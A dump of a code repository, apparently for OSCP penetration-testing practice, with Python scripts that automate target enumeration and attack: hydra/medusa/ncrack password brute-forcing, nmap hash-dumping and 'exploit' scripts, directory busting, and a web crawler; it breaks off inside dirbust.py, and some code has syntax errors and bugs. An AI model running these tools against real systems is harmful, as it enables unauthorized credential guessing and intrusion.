├── README.md ├── brutepwd.py ├── crawler.py ├── deepscan.py ├── dirbust.py ├── dnsrecon.org ├── dnsrecon.py ├── exploitdb.txt ├── f.py ├── f1.py ├── ftpbust.py ├── ftpcompromise.py ├── ftprecon.py ├── gogolab.sh ├── nmapxml.py ├── nmapxml.pyc ├── oportscan.py ├── passwords.txt ├── recon.conf ├── reconf.py ├── reconf.pyc ├── reconscan.py ├── rpcrecon.py ├── setup.py ├── smbrecon.py ├── smtprecon.py ├── snmprecon.py ├── sshrecon.py ├── support.txt ├── t.py ├── t1.py ├── users.txt ├── vulnrecon.py └── winrmrecon.py /README.md: -------------------------------------------------------------------------------- 1 | # oscp 2 | 3 | https://drive.google.com/folderview?id=0B8BpJ_bHwXSKZ2ZiR1FQTHNoOEk&usp=sharing&tid=0B8BpJ_bHwXSKak0xRjdnaWFiYzg 4 | -------------------------------------------------------------------------------- /brutepwd.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import subprocess 3 | import multiprocessing 4 | from multiprocessing import * 5 | import os 6 | import sys 7 | import re 8 | import reconf 9 | from reconf import * 10 | import time 11 | from functools import wraps 12 | import argparse 13 | import ipaddr 14 | import nmapxml 15 | from nmapxml import * 16 | import threading 17 | from easyprocess import EasyProcess 18 | 19 | parser = argparse.ArgumentParser(description='Run a short or verbose dirb scan') 20 | parser.add_argument('-ip', action='store', required=True, help='IP Address to be assessed') 21 | parser.add_argument('-s', action='store', required=True, help='Service') 22 | parser.add_argument('-a', action='store_true', required=False, help='ALL') 23 | parser.add_argument('-hy', action='store_true', required=False, help='hydra') 24 | parser.add_argument('-n', action='store_true', required=False, help='ncrack') 25 | parser.add_argument('-m', action='store_true', required=False, help='medusa') 26 | 27 | args = parser.parse_args() 28 | try: 29 | ip_address = ipaddr.IPAddress(args.ip) 30 | except: 31 | print "Try again..." 32 | sys.exit() 33 | 34 | stype = args.s 35 | 36 | def chkcreds(EXECMD, TOUT=300): 37 | #subprocess.call(EXECMD, shell=True) 38 | try: 39 | proc = EasyProcess(EXECMD).call(timeout=TOUT).stdout 40 | finally: 41 | pass 42 | 43 | if args.a is True or args.m is True and args.hy is False and args.n is False: 44 | medusasrv = ['csv','ftp','http','imap','mssql','mysql','nntp','pcanywhere','pop3','postgres','rexec','rlogin','rsh','smb','smtp','snmp','ssh','svn','telnet','vmauthd','vnc','web'] 45 | if stype in medusasrv: 46 | try: 47 | outfile = "%s/%s_%s_medusa.txt" % (reconf.rsltpth, ip_address, stype) 48 | MEDUSA = "medusa -h %s -U %s -P %s -O %s -e ns -v 4 -M %s" % (ip_address, reconf.usrlst, reconf.pwdlst, outfile, stype) 49 | print "\033[1;31m[>]\033[0;m Executing %s" % MEDUSA 50 | chkcreds(MEDUSA, 300) 51 | finally: 52 | pass 53 | 54 | if args.a is True or args.n is True and args.hy is False and args.m is False: 55 | ncracksrv = ['ftp', 'ssh', 'telnet', 'http', 'pop3', 'smb', 'rdp', 'vnc'] 56 | if stype in ncracksrv: 57 | try: 58 | outfile = "%s/%s_%s_ncrack.txt" % (reconf.rsltpth, ip_address, stype) 59 | NCRACK = "ncrack -p %s -u %s -p %s -T4 -oA %s %s" % (stype, reconf.usrlst, reconf.pwdlst, outfile, ip_address) 60 | print "\033[1;31m[>]\033[0;m Executing %s" % NCRACK 61 | chkcreds(NCRACK, 300) 62 | finally: 63 | pass 64 | 65 | if args.a is True or args.hy is True and args.n is False and args.m is False: 66 | hydrasrv = ['cisco', 'cisco-enable', 'cvs', 'firebird', 'ftp', 'ftps', 'http', 'icq', 'imap', 'irc', 'ldap2', 'ldap3', 'mssql', 'mysql', 'nntp', 'oracle-listener', 'oracle-sid', 'pcanywhere', 'pcnfs', 'pop3', 'postgres', 'rdp', 'redis', 'rexec', 'rlogin', 'rsh', 's7', 'sip', 'smb', 'smtp', 'smtp-enum', 'snmp', 'socks5', 'ssh', 'sshkey', 'svn', 'teamspeak', 'telnet', 'vmauthd', 'vnc', 'xmpp'] 67 | if stype in hydrasrv: 68 | try: 69 | outfile = "%s/%s_%s_hydra.txt" % (reconf.rsltpth, ip_address, stype) 70 | HYDRA = "hydra -L %s -P %s -q -e ns -o %s %s %s" % (reconf.usrlst, reconf.pwdlst, outfile, ip_address, stype) 71 | chkcreds(HYDRA, 300) 72 | finally: 73 | pass 74 | -------------------------------------------------------------------------------- /crawler.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ This is a modified version of James Mills' original recipe. """ 4 | 5 | import re 6 | import sys 7 | import time 8 | import math 9 | import urllib2 10 | import urlparse 11 | import optparse 12 | import hashlib 13 | from cgi import escape 14 | from traceback import format_exc 15 | from Queue import Queue, Empty as QueueEmpty 16 | 17 | from bs4 import BeautifulSoup 18 | 19 | class Link (object): 20 | 21 | def __init__(self, src, dst, link_type): 22 | self.src = src 23 | self.dst = dst 24 | self.link_type = link_type 25 | 26 | def __hash__(self): 27 | return hash((self.src, self.dst, self.link_type)) 28 | 29 | def __eq__(self, other): 30 | return (self.src == other.src and 31 | self.dst == other.dst and 32 | self.link_type == other.link_type) 33 | 34 | def __str__(self): 35 | return self.src + " -> " + self.dst 36 | 37 | class Crawler(object): 38 | 39 | def __init__(self, root, depth_limit, confine=None, exclude=[], locked=True, filter_seen=True): 40 | self.root = root 41 | self.host = urlparse.urlparse(root)[1] 42 | 43 | ## Data for filters: 44 | self.depth_limit = depth_limit # Max depth (number of hops from root) 45 | self.locked = locked # Limit search to a single host? 46 | self.confine_prefix=confine # Limit search to this prefix 47 | self.exclude_prefixes=exclude; # URL prefixes NOT to visit 48 | 49 | 50 | self.urls_seen = set() # Used to avoid putting duplicates in queue 51 | self.urls_remembered = set() # For reporting to user 52 | self.visited_links= set() # Used to avoid re-processing a page 53 | self.links_remembered = set() # For reporting to user 54 | 55 | self.num_links = 0 # Links found (and not excluded by filters) 56 | self.num_followed = 0 # Links followed. 57 | 58 | # Pre-visit filters: Only visit a URL if it passes these tests 59 | self.pre_visit_filters=[self._prefix_ok, 60 | self._exclude_ok, 61 | self._not_visited, 62 | self._same_host] 63 | 64 | # Out-url filters: When examining a visited page, only process 65 | # links where the target matches these filters. 66 | if filter_seen: 67 | self.out_url_filters=[self._prefix_ok, 68 | self._same_host] 69 | else: 70 | self.out_url_filters=[] 71 | 72 | def _pre_visit_url_condense(self, url): 73 | 74 | """ Reduce (condense) URLs into some canonical form before 75 | visiting. All occurrences of equivalent URLs are treated as 76 | identical. 77 | 78 | All this does is strip the \"fragment\" component from URLs, 79 | so that http://foo.com/blah.html\#baz becomes 80 | http://foo.com/blah.html """ 81 | 82 | base, frag = urlparse.urldefrag(url) 83 | return base 84 | 85 | ## URL Filtering functions. These all use information from the 86 | ## state of the Crawler to evaluate whether a given URL should be 87 | ## used in some context. Return value of True indicates that the 88 | ## URL should be used. 89 | 90 | def _prefix_ok(self, url): 91 | """Pass if the URL has the correct prefix, or none is specified""" 92 | return (self.confine_prefix is None or 93 | url.startswith(self.confine_prefix)) 94 | 95 | def _exclude_ok(self, url): 96 | """Pass if the URL does not match any exclude patterns""" 97 | prefixes_ok = [ not url.startswith(p) for p in self.exclude_prefixes] 98 | return all(prefixes_ok) 99 | 100 | def _not_visited(self, url): 101 | """Pass if the URL has not already been visited""" 102 | return (url not in self.visited_links) 103 | 104 | def _same_host(self, url): 105 | """Pass if the URL is on the same host as the root URL""" 106 | try: 107 | host = urlparse.urlparse(url)[1] 108 | return re.match(".*%s" % self.host, host) 109 | except Exception, e: 110 | print >> sys.stderr, "ERROR: Can't process url '%s' (%s)" % (url, e) 111 | return False 112 | 113 | 114 | def crawl(self): 115 | 116 | """ Main function in the crawling process. Core algorithm is: 117 | 118 | q <- starting page 119 | while q not empty: 120 | url <- q.get() 121 | if url is new and suitable: 122 | page <- fetch(url) 123 | q.put(urls found in page) 124 | else: 125 | nothing 126 | 127 | new and suitable means that we don't re-visit URLs we've seen 128 | already fetched, and user-supplied criteria like maximum 129 | search depth are checked. """ 130 | 131 | q = Queue() 132 | q.put((self.root, 0)) 133 | 134 | while not q.empty(): 135 | this_url, depth = q.get() 136 | 137 | #Non-URL-specific filter: Discard anything over depth limit 138 | if depth > self.depth_limit: 139 | continue 140 | 141 | #Apply URL-based filters. 142 | do_not_follow = [f for f in self.pre_visit_filters if not f(this_url)] 143 | 144 | #Special-case depth 0 (starting URL) 145 | if depth == 0 and [] != do_not_follow: 146 | print >> sys.stderr, "Whoops! Starting URL %s rejected by the following filters:", do_not_follow 147 | 148 | #If no filters failed (that is, all passed), process URL 149 | if [] == do_not_follow: 150 | try: 151 | self.visited_links.add(this_url) 152 | self.num_followed += 1 153 | page = Fetcher(this_url) 154 | page.fetch() 155 | for link_url in [self._pre_visit_url_condense(l) for l in page.out_links()]: 156 | if link_url not in self.urls_seen: 157 | q.put((link_url, depth+1)) 158 | self.urls_seen.add(link_url) 159 | 160 | do_not_remember = [f for f in self.out_url_filters if not f(link_url)] 161 | if [] == do_not_remember: 162 | self.num_links += 1 163 | self.urls_remembered.add(link_url) 164 | link = Link(this_url, link_url, "href") 165 | if link not in self.links_remembered: 166 | self.links_remembered.add(link) 167 | except Exception, e: 168 | print >>sys.stderr, "ERROR: Can't process url '%s' (%s)" % (this_url, e) 169 | #print format_exc() 170 | 171 | class OpaqueDataException (Exception): 172 | def __init__(self, message, mimetype, url): 173 | Exception.__init__(self, message) 174 | self.mimetype=mimetype 175 | self.url=url 176 | 177 | 178 | class Fetcher(object): 179 | 180 | """The name Fetcher is a slight misnomer: This class retrieves and interprets web pages.""" 181 | 182 | def __init__(self, url): 183 | self.url = url 184 | self.out_urls = [] 185 | 186 | def __getitem__(self, x): 187 | return self.out_urls[x] 188 | 189 | def out_links(self): 190 | return self.out_urls 191 | 192 | #def _addHeaders(self, request): 193 | # request.add_header("User-Agent", AGENT) 194 | 195 | def _open(self): 196 | url = self.url 197 | try: 198 | request = urllib2.Request(url) 199 | handle = urllib2.build_opener() 200 | except IOError: 201 | return None 202 | return (request, handle) 203 | 204 | def fetch(self): 205 | request, handle = self._open() 206 | #self._addHeaders(request) 207 | if handle: 208 | try: 209 | data=handle.open(request) 210 | mime_type=data.info().gettype() 211 | url=data.geturl(); 212 | if mime_type != "text/html": 213 | raise OpaqueDataException("Not interested in files of type %s" % mime_type, 214 | mime_type, url) 215 | content = unicode(data.read(), "utf-8", 216 | errors="replace") 217 | soup = BeautifulSoup(content) 218 | tags = soup('a') 219 | except urllib2.HTTPError, error: 220 | if error.code == 404: 221 | print >> sys.stderr, "ERROR: %s -> %s" % (error, error.url) 222 | else: 223 | print >> sys.stderr, "ERROR: %s" % error 224 | tags = [] 225 | except urllib2.URLError, error: 226 | print >> sys.stderr, "ERROR: %s" % error 227 | tags = [] 228 | except OpaqueDataException, error: 229 | print >>sys.stderr, "Skipping %s, has type %s" % (error.url, error.mimetype) 230 | tags = [] 231 | for tag in tags: 232 | href = tag.get("href") 233 | if href is not None: 234 | url = urlparse.urljoin(self.url, escape(href)) 235 | if url not in self: 236 | self.out_urls.append(url) 237 | 238 | def getLinks(url): 239 | page = Fetcher(url) 240 | page.fetch() 241 | """for i, url in enumerate(page): 242 | print "%d. %s" % (i, url) """ 243 | j = 1 244 | for i, url in enumerate(page): 245 | if url.find("http")>=0: 246 | print "%d. %s" % (j, url) 247 | j = j + 1 248 | 249 | def parse_options(): 250 | """parse_options() -> opts, args 251 | 252 | Parse any command-line options given returning both 253 | the parsed options and arguments. 254 | """ 255 | 256 | parser = optparse.OptionParser() 257 | 258 | parser.add_option("-q", "--quiet", 259 | action="store_true", default=False, dest="quiet", 260 | help="Enable quiet mode") 261 | 262 | parser.add_option("-l", "--links", 263 | action="store_true", default=False, dest="links", 264 | help="Get links for specified url only") 265 | 266 | parser.add_option("-d", "--depth", 267 | action="store", type="int", default=30, dest="depth_limit", 268 | help="Maximum depth to traverse") 269 | 270 | parser.add_option("-c", "--confine", 271 | action="store", type="string", dest="confine", 272 | help="Confine crawl to specified prefix") 273 | 274 | parser.add_option("-x", "--exclude", action="append", type="string", 275 | dest="exclude", default=[], help="Exclude URLs by prefix") 276 | 277 | parser.add_option("-L", "--show-links", action="store_true", default=False, 278 | dest="out_links", help="Output links found") 279 | 280 | parser.add_option("-u", "--show-urls", action="store_true", default=False, 281 | dest="out_urls", help="Output URLs found") 282 | 283 | parser.add_option("-D", "--dot", action="store_true", default=False, 284 | dest="out_dot", help="Output Graphviz dot file") 285 | 286 | 287 | 288 | opts, args = parser.parse_args() 289 | 290 | if len(args) < 1: 291 | parser.print_help(sys.stderr) 292 | raise SystemExit, 1 293 | 294 | if opts.out_links and opts.out_urls: 295 | parser.print_help(sys.stderr) 296 | parser.error("options -L and -u are mutually exclusive") 297 | 298 | return opts, args 299 | 300 | class DotWriter: 301 | 302 | """ Formats a collection of Link objects as a Graphviz (Dot) 303 | graph. Mostly, this means creating a node for each URL with a 304 | name which Graphviz will accept, and declaring links between those 305 | nodes.""" 306 | 307 | def __init__ (self): 308 | self.node_alias = {} 309 | 310 | def _safe_alias(self, url, silent=False): 311 | 312 | """Translate URLs into unique strings guaranteed to be safe as 313 | node names in the Graphviz language. Currently, that's based 314 | on the md5 digest, in hexadecimal.""" 315 | 316 | if url in self.node_alias: 317 | return self.node_alias[url] 318 | else: 319 | m = hashlib.md5() 320 | m.update(url) 321 | name = "N"+m.hexdigest() 322 | self.node_alias[url]=name 323 | if not silent: 324 | print "\t%s [label=\"%s\"];" % (name, url) 325 | return name 326 | 327 | 328 | def asDot(self, links): 329 | 330 | """ Render a collection of Link objects as a Dot graph""" 331 | 332 | print "digraph Crawl {" 333 | print "\t edge [K=0.2, len=0.1];" 334 | for l in links: 335 | print "\t" + self._safe_alias(l.src) + " -> " + self._safe_alias(l.dst) + ";" 336 | print "}" 337 | 338 | 339 | 340 | 341 | def main(): 342 | opts, args = parse_options() 343 | 344 | url = args[0] 345 | 346 | if opts.links: 347 | getLinks(url) 348 | raise SystemExit, 0 349 | 350 | depth_limit = opts.depth_limit 351 | confine_prefix=opts.confine 352 | exclude=opts.exclude 353 | 354 | sTime = time.time() 355 | 356 | print >> sys.stderr, "Crawling %s (Max Depth: %d)" % (url, depth_limit) 357 | crawler = Crawler(url, depth_limit, confine_prefix, exclude) 358 | crawler.crawl() 359 | 360 | if opts.out_urls: 361 | print "\n".join(crawler.urls_seen) 362 | 363 | if opts.out_links: 364 | print "\n".join([str(l) for l in crawler.links_remembered]) 365 | 366 | if opts.out_dot: 367 | d = DotWriter() 368 | d.asDot(crawler.links_remembered) 369 | 370 | eTime = time.time() 371 | tTime = eTime - sTime 372 | 373 | print >> sys.stderr, "Found: %d" % crawler.num_links 374 | print >> sys.stderr, "Followed: %d" % crawler.num_followed 375 | print >> sys.stderr, "Stats: (%d/s after %0.2fs)" % ( 376 | int(math.ceil(float(crawler.num_links) / tTime)), tTime) 377 | 378 | if __name__ == "__main__": 379 | main() 380 | -------------------------------------------------------------------------------- /deepscan.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import xml.etree.ElementTree 3 | from libnmap.parser import NmapParser 4 | import subprocess 5 | from subprocess import * 6 | import sys 7 | import os 8 | import re 9 | import reconf 10 | from reconf import * 11 | 12 | if len(sys.argv) != 2: 13 | print "Usage: deeprecon.py " 14 | sys.exit(0) 15 | 16 | ip_address = sys.argv[1].strip() 17 | 18 | def chkfolders(): 19 | dpths = [reconf.rootpth,reconf.labpath,reconf.rsltpth,reconf.exampth,reconf.nmappth] 20 | for dpth in dpths: 21 | if not os.path.exists(dpth): 22 | os.makedirs(dpth) 23 | 24 | def multProc(targetin, scanip, port): 25 | jobs = [] 26 | p = multiprocessing.Process(target=targetin, args=(scanip,port)) 27 | jobs.append(p) 28 | p.start() 29 | return 30 | 31 | def dnsEnum(ip_address, port): 32 | print "INFO: Detected DNS on %s %s" % (ip_address, port) 33 | if port.strip() == "53": 34 | SCRIPT = "./dnsrecon.py -ip %s" % (ip_address) 35 | subprocess.call(SCRIPT, shell=True) 36 | return 37 | 38 | def searchsploitEnum(ip_address): 39 | print "INFO: Searching for known exploits for %s" % (ip_address) 40 | SCRIPT = "./vulnrecon.py %s" % (ip_address) 41 | subprocess.call(SCRIPT, shell=True) 42 | return 43 | 44 | def httpEnum(ip_address, port): 45 | print "INFO: Gathering additional HTTP information %s:%s" % (ip_address, port) 46 | HTTPSCAN = "nmap -Pn -n -vv -sC -p %s --script=%s -oA %s/%s_http %s" % (port, reconf.httpnse, reconf.exampth, ip_address, ip_address) 47 | results = subprocess.check_output(HTTPSCAN, shell=True) 48 | HTTPHDRS = "nmap -Pn -n -vv -p %s --script=%s -oA %s/%s_%s_httpheader %s" % (port, 'http-headers', reconf.exampth, ip_address, port, ip_address) 49 | results = subprocess.check_output(HTTPHDRS, shell=True) 50 | 51 | def httpsEnum(ip_address, port): 52 | print "INFO: Gathering additional HTTPS information %s:%s" % (ip_address, port) 53 | HTTPSCANS = "nmap -Pn -n -vv -sC -p %s --script=%s -oA %s/%s_https %s" % (port, reconf.httpnse, reconf.exampth, ip_address, ip_address) 54 | results = subprocess.check_output(HTTPSCANS, shell=True) 55 | HTTPHDRS = "nmap -Pn -n -vv -p %s --script=%s -oA %s/%s_%s_httpheader %s" % (port, 'http-headers', reconf.exampth, ip_address, port, ip_address) 56 | results = subprocess.check_output(HTTPHDRS, shell=True) 57 | 58 | def hgreEnum(ip_address, port): 59 | print "INFO: Searching for sensitive information on %s:%s" % (ip_address, port) 60 | HTTPGREP = "nmap -Pn -n -vv -oA %s/%s_httpgrep -p %s %s --script http-grep --script-args http-grep.builtins" % (reconf.exampth, ip_address, port, ip_address) 61 | results = subprocess.check_output(HTTPGREP, shell=True) 62 | 63 | def niktoEnum(ip_address, port) 64 | print "INFO: Performing Nikto scan on %s:%s" % (ip_address, port) 65 | NIKTOSCAN = "nikto -host %s -p %s > %s._nikto" % (ip_address, port, ip_address) 66 | results = subprocess.check_output(NIKTOSCAN, shell=True) 67 | 68 | def dirbEnum(ip_address): 69 | print "INFO: Brute force dictionary attack for directories on %s" % (ip_address) 70 | DIRBUST = "./dirbust.py -ip %s -ss" % (ip_address) 71 | subprocess.call(DIRBUST, shell=True) 72 | 73 | def oracleEnum(ip_address, port): 74 | print "INFO: Detected Oracle on %s:%s" % (ip_address, port) 75 | ORACLESCAN = "nmap -vv -Pn -p %s --script=oracle-enum-users,oracle-sid-brute -oA %s/%s_oracle.xml %s" % (port, reconf.exampth, ip_address, ip_address) 76 | results = subprocess.check_output(ORACLESCAN, shell=True) 77 | 78 | def mssqlEnum(ip_address, port): 79 | print "INFO: Detected MS-SQL on %s:%s" % (ip_address, port) 80 | print "INFO: Performing nmap mssql script scan for %s:%s" % (ip_address, port) 81 | MSSQLSCAN = "nmap -vv -Pn -p %s --script=ms-sql-info,ms-sql-config,ms-sql-dump-hashes --script-args=mssql.instance-port=1433,smsql.username-sa,mssql.password-sa -oA %s/%s_mssql.xml %s" % (port, reconf.exampth, ip_address, ip_address) 82 | subprocess.call(MSSQLSCAN, shell=True) 83 | 84 | def mysqlEnum(ip_address, port): 85 | print "INFO: Detected MySQL on %s:%s" % (ip_address, port) 86 | print "INFO: Performing nmap mssql script scan for %s:%s" % (ip_address, port) 87 | MYSQLSCAN = "nmap -vv -Pn -p %s --script=mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 -oA %s/%s_mysql.xml %s" % (port, reconf.exampth, ip_address, ip_address) 88 | subprocess.call(MYSQLSCAN, shell=True) 89 | HYDRA = "hydra -L %s -P %s -f -t 1 -o %s/%s_mysqlhydra.txt %s mysql" % (reconf.usrlst, reconf.pwdlst, reconf.exampth, ip_address, ip_address) 90 | results = subprocess.check_output(HYDRA, shell=True) 91 | resultarr = results.split("\n") 92 | for result in resultarr: 93 | if "login:" in result: 94 | print "[*] Valid ftp credentials found: " + result 95 | MEDUSA = "medusa -L %s -P %s -f -t 1 -o %s/%s_mysqlhydra.txt %s mysql" % (reconf.usrlst, reconf.pwdlst, reconf.exampth, ip_address, ip_address) 96 | results = subprocess.check_output(HYDRA, shell=True) 97 | resultarr = results.split("\n") 98 | for result in resultarr: 99 | if "login:" in result: 100 | print "[*] Valid ftp credentials found: " + result 101 | 102 | 103 | def sshEnum(ip_address, port): 104 | print "INFO: Detected SSH on %s:%s" % (ip_address, port) 105 | SCRIPT = "./sshrecon.py %s %s" % (ip_address, port) 106 | subprocess.call(SCRIPT, shell=True) 107 | return 108 | 109 | def snmpEnum(ip_address, port): 110 | print "INFO: Detected snmp on %s:%s" % (ip_address, port) 111 | SCRIPT = "./snmprecon.py %s" % (ip_address) 112 | subprocess.call(SCRIPT, shell=True) 113 | return 114 | 115 | def smtpEnum(ip_address, port): 116 | print "INFO: Detected smtp on %s:%s" % (ip_address, port) 117 | if port.strip() == "25": 118 | SCRIPT = "./smtprecon.py %s" % (ip_address) 119 | subprocess.call(SCRIPT, shell=True) 120 | else: 121 | print "WARNING: SMTP detected on non-standard port, smtprecon skipped (must run manually)" 122 | return 123 | 124 | def smbEnum(ip_address, port): 125 | print "INFO: Detected SMB on %s:%s" % (ip_address, port) 126 | SCRIPT = "./smbrecon.py %s" % (ip_address) 127 | subprocess.call(SCRIPT, shell=True) 128 | return 129 | 130 | def tbdEnum(tbd): 131 | print "\033[1;31m[!]\033[1;m To be developed: %s" % (tbd) 132 | return 133 | 134 | def ftpEnum(ip_address, port): 135 | print "INFO: Detected ftp on %s:%s" % (ip_address, port) 136 | SCRIPT = "./ftprecon.py %s %s" % (ip_address, port) 137 | subprocess.call(SCRIPT, shell=True) 138 | return 139 | 140 | def altOSEnum(ip_address): 141 | print "INFO: Alternative OS detection for %s" % (ip_address) 142 | OSTRY = "nmap -O --osscan-guess %s" % (ip_address) 143 | results = subprocess.check_output(OSTRY, shell=True) 144 | rsltarray = results.split('\n') 145 | for line in rsltarray: 146 | if re.search('Running',line): 147 | return line.split(':')[1].strip() 148 | 149 | def opnPORTS(ip_address): 150 | try: 151 | fnmap = "%s/%s.nmap" % (reconf.exampth, ip_address) 152 | print "\033[1;31m [!] \033[0;m Parsing %s for identifying open ports" % (fnmap) 153 | if os.path.isfile(fnmap): 154 | CATS = "cat %s | grep open | cut -d'/' -f1 | sort -h | tr '\n' ','" % (fnmap) 155 | results = subprocess.check_output(CATS, shell=True) 156 | results = results.rstrip(',') 157 | else: 158 | print "\033[1;38m [!] \033[0;m %s is missing. Run nmap with the -oA option" % (fnmap) 159 | return results 160 | except: 161 | pass 162 | 163 | def vulnCHK(ip_address): 164 | oprts = opnPORTS(ip_address) 165 | print "\033[1;31m [!] \033[0;m Ports found: %s " % (oprts) 166 | if oprts == "": 167 | VCHK = "nmap -sV -vv -A -sC -Pn -n --script vuln --script-args=unsafe=1 -oA '%s/%s_vuln' %s" % (reconf.exampth, ip_address, ip_address) 168 | else: 169 | VCHK = "nmap -sV -vv -A -sC -Pn -n -p %s --script vuln --script-args=unsafe=1 -oA '%s/%s_vuln' %s" % (oprts, reconf.exampth, ip_address, ip_address) 170 | print "[+] Executing - %s" % (VCHK) 171 | print "\033[1;33m[*]\033[0;m Running general vuln scans for " + ip_address 172 | subprocess.call(VCHK, shell=True) 173 | 174 | def exploitCHK(ip_address): 175 | oprts = opnPORTS(ip_address) 176 | print "\033[1;31m [!] \033[0;m Ports found: %s " % (oprts) 177 | if oprts == "": 178 | ECHK = "nmap -sV -vv -Pn -n --script exploit --script-args=unsafe=1 -oA '%s/%s_exploit' %s" % (reconf.exampth, ip_address, ip_address) 179 | else: 180 | ECHK = "nmap -sV -vv -Pn -n -p %s --script exploit --script-args=unsafe=1 -oA '%s/%s_exploit' %s" % (oprts, reconf.exampth, ip_address, ip_address) 181 | print "[+] Executing - %s" % (ECHK) 182 | print "\033[1;33m[*]\033[0;m Attempting to exploit " + ip_address 183 | subprocess.call(ECHK, shell=True) 184 | 185 | if __name__=='__main__': 186 | 187 | vulnCHK(ip_address) 188 | exploitCHK(ip_address) 189 | 190 | print "[*] Parsing %s/%s.xml" % (reconf.exampth, ip_address) 191 | xmlfile = "%s/%s.xml" % (reconf.exampth, ip_address) 192 | tree = xml.etree.ElementTree.parse(xmlfile) 193 | 194 | rep = NmapParser.parse_fromfile(xmlfile) 195 | for _host in rep.hosts: 196 | host = ', '.join(_host.hostnames) 197 | ip = (_host.address) 198 | 199 | serv = [] 200 | for attb in tree.iter('service'): 201 | #print attb.attrib 202 | name = attb.attrib.get('name') 203 | serv.append(name) 204 | 205 | try: 206 | for osmatch in _host.os.osmatches: 207 | osys = osmatch.name 208 | except IOError: 209 | osys = 'Microsoft' 210 | else: 211 | osys = altOSEnum(ip_address) 212 | 213 | print "OS: %s" % (osys) 214 | 215 | if re.match('Microsoft', osys) and osys != "": 216 | cnt=0 217 | for services in _host.services: 218 | print 219 | print "\033[1;33m[+]\033[1;m Port: "'{0: <5}'.format(services.port), "Service: "'{0: <10}'.format(serv[cnt]) 220 | print 221 | # 21 222 | if re.search('ftp', serv[cnt]): 223 | print "[+] Running ftpEnum %s, %s" % (ip_address, services.port) 224 | ftpEnum(ip_address, services.port) 225 | # 22 226 | if re.search('ssh',serv[cnt]): 227 | print "[+] Running sshEnum %s, %s" % (ip_address, services.port) 228 | sshEnum(ip_address, services.port) 229 | # 25 230 | if re.search('smtp',serv[cnt]): 231 | print "[+] Running smtpEnum %s, %s" % (ip_address, services.port) 232 | smtpEnum(ip_address, services.port) 233 | # 53 234 | if re.search('domain',serv[cnt]): 235 | print "[+] Running dnsEnum %s, %s" % (ip_address, services.port) 236 | dnsEnum(ip_address, services.port) 237 | # 80 238 | if not re.search('https',serv[cnt]) and re.search('http',serv[cnt]): 239 | print "[+] Running httpEnum %s, %s" % (ip_address, services.port) 240 | httpEnum(ip_address, services.port) 241 | hgreEnum(ip_address, services.port) 242 | # 135 243 | if re.search('msrpc', serv[cnt]): 244 | print "[+] Running rpcEnum %s, %s" % (ip_address, services.port) 245 | tbdEnum(serv[cnt]) 246 | # 139 247 | if re.search('netbios-ssn', serv[cnt]): 248 | print "[+] Running rpcEnum %s, %s" % (ip_address, services.port) 249 | tbdEnum(serv[cnt]) 250 | # 161-162 251 | if re.search('snmp',serv[cnt]): 252 | print "[+] Running snmpEnum %s, %s" % (ip_address, services.port) 253 | snmpEnum(ip_address, services.port) 254 | # 443 255 | if re.search('https',serv[cnt]) or re.search('ssl\/http',serv[cnt]): 256 | print "[+] Running httpsEnum %s, %s" % (ip_address, services.port) 257 | httpsEnum(ip_address, services.port) 258 | hgreEnum(ip_address, services.port) 259 | # 445 260 | if re.search('microsoft-ds', serv[cnt]): 261 | print "[+] Running smbEnum %s, %s" % (ip_address, services.port) 262 | smbEnum(ip_address, services.port) 263 | # 1433-1434 264 | if re.search('ms-sql', serv[cnt]): 265 | print "[+] Running mssqlEnum %s, %s" % (ip_address, services.port) 266 | mssqlEnum(ip_address, services.port) 267 | # 1521 268 | if re.search('oracle', serv[cnt]): 269 | print "[+] Running oracleEnum %s, %s" % (ip_address, services.port) 270 | oracleEnum(ip_address, services.port) 271 | # 3306 272 | if re.search('mysql', serv[cnt]): 273 | print "[+] Running mysqlEnum %s, %s" % (ip_address, services.port) 274 | mysqlEnum(ip_address, services.port) 275 | cnt += 1 276 | print 277 | print "INFO: Deep scan completed for " + ip_address 278 | else: 279 | print "OS Unknown: %s" % (osys) 280 | 281 | 282 | if re.match('Linux', osys) and osys != "": 283 | cnt = 0 284 | for services in _host.services: 285 | print "Port: "'{0: <5}'.format(services.port), "State: "'{0: <5}'.format(services.state), "Protocol: "'{0: <2}'.format(services.protocol), "Service: "'{0:<10}'.format(serv[cnt]) 286 | cnt += 1 287 | else: 288 | print "OS: Unknown %s" % (osys) 289 | 290 | -------------------------------------------------------------------------------- /dirbust.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import subprocess 3 | import multiprocessing 4 | from multiprocessing import * 5 | import os 6 | import sys 7 | import re 8 | import reconf 9 | from reconf import * 10 | import time 11 | from functools import wraps 12 | import argparse 13 | import ipaddr 14 | import nmapxml 15 | from nmapxml import * 16 | 17 | parser = argparse.ArgumentParser(description='Run a short or verbose dirb scan') 18 | parser.add_argument('-ip', action='store', required=True, help='IP Address to be assessed') 19 | parser.add_argument('-s', action='store_true', required=False, help='Quick Scan') 20 | parser.add_argument('-ss', action='store_true', required=False, help='Quicker Scan') 21 | 22 | args = parser.parse_args() 23 | try: 24 | ip_address = ipaddr.IPAddress(args.ip) 25 | except: 26 | print "Try again..." 27 | sys.exit() 28 | 29 | def hms(seconds): 30 | m, s = divmod(seconds, 60) 31 | h, m = divmod(m, 60) 32 | return("%d:%02d:%02d" % (h, m, s)) 33 | 34 | def fn_timer(function): 35 | @wraps(function) 36 | def function_timer(*args, **kwargs): 37 | t0 = time.time() 38 | result = function(*args, **kwargs) 39 | t1 = time.time() 40 | print ("\033[0;30mTook %s \033[1;30m%s\033[0;m to complete\033[0;m" % 41 | (function.func_name, hms(t1-t0)) 42 | ) 43 | return result 44 | return function_timer 45 | 46 | def multProc(targetin, scanip, port): 47 | jobs = [] 48 | p = multiprocessing.Process(target=targetin, args=(scanip,port)) 49 | jobs.append(p) 50 | p.start() 51 | return 52 | 53 | @fn_timer 54 | def dirbBlast(prot, ip_address, port, igncap, srvr): 55 | ''' 56 | prot = http or https 57 | igncap = -i 58 | srvr = vulns files 59 | ''' 60 | found = [] 61 | dirbargs = "" 62 | url = "%s://%s:%s" % (prot, ip_address, port) 63 | print "\033[0;33m[>]\033[0;m Running dirb scan for %s" % (url) 64 | outfile = "%s/%s_%s_dirb.txt" % 